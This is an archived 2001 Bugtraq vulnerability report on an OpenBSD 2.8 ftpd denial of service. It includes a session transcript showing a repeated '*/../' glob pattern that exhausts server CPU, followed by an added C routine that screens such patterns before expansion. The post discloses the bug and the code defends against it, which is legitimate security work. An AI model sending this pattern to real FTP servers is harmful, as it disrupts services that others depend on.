[19758] in bugtraq
Multiple vendors FTP denial of service
daemon@ATHENA.MIT.EDU (Peter Timothey Hessler)
Wed Mar 21 17:33:20 2001
Message-ID: <3AB78786.1C06FC5E@paychex.com>
Date: Tue, 20 Mar 2001 08:38:31 -0800
Reply-To: phessler@paychex.com
From: Peter Timothey Hessler <phessler@paychex.com>
To: BUGTRAQ@SECURITYFOCUS.COM
OpenBSD 2.8 (from CD) goes to 100% CPU. Just ftpd, sshd and telnetd
running.
ftpd ran from /etc/rc; shell is bash. Relevant system info: Pentium 133,
32Meg RAM, 4Gig hard drive, 100baseT NIC.
Connected to 127.0.0.1.
220 phobos FTP server (Version 6.5/OpenBSD) ready.
Name (127.0.0.1:luser): luser
331 Password required for luser.
Password:
230 User luser logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
(pause for approx. 120 seconds)
229 Entering Extended Passive Mode (|||10965|)
421 Service not available, remote server has closed connection.
ftp>
After ftpd is using >90% CPU, I can still log in and work like normal,
with a small noticeable delay.
--
Peter Hessler
Paychex Inc. MMS Pleasanton Branch
Tech Support 925-463-6500
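
Added example, not part of the original post and not OpenBSD's ftpd code: a pre-glob guard an FTP server could apply to a client-supplied pattern before expanding it. Each `*/..` pair in the pattern above sends the expansion back into the same directory, so the work multiplies with every repetition; the check rejects a wildcard component followed by `..` and caps the number of wildcard components. The function name, verdict codes and both limits are assumptions chosen for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed limits for illustration; tune them for the server. */
#define MAX_PATTERN_LEN     256
#define MAX_WILD_COMPONENTS 3

enum glob_verdict { GLOB_OK, GLOB_TOO_LONG, GLOB_TOO_MANY_WILD, GLOB_WILD_THEN_DOTDOT };

/* True if the path component [s, s+n) contains a glob metacharacter. */
static bool has_meta(const char *s, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (strchr("*?[{", s[i]) != NULL)
            return true;
    return false;
}

/* Walk the pattern one '/'-separated component at a time and bound its cost. */
enum glob_verdict check_glob_pattern(const char *pattern)
{
    size_t wild = 0;
    bool prev_wild = false;

    if (strlen(pattern) > MAX_PATTERN_LEN)
        return GLOB_TOO_LONG;
    for (const char *p = pattern; *p != '\0'; ) {
        size_t n = strcspn(p, "/");
        if (n > 0) {                      /* skip empty components ("//") */
            bool is_wild = has_meta(p, n);
            bool is_dotdot = (n == 2 && p[0] == '.' && p[1] == '.');
            if (is_dotdot && prev_wild)   /* "<wildcard>/.." re-expands the parent */
                return GLOB_WILD_THEN_DOTDOT;
            if (is_wild && ++wild > MAX_WILD_COMPONENTS)
                return GLOB_TOO_MANY_WILD;
            prev_wild = is_wild;
        }
        p += n + (p[n] == '/');           /* step past the component and its '/' */
    }
    return GLOB_OK;
}

int main(void)
{
    /* Constructed input: a shortened form of the pattern in the post. */
    printf("%d\n", check_glob_pattern("*/../*/../*"));
    return 0;
}
```

A server would call `check_glob_pattern()` on the argument of LIST/NLST and refuse the command on any verdict other than `GLOB_OK`, before the pattern reaches glob(3).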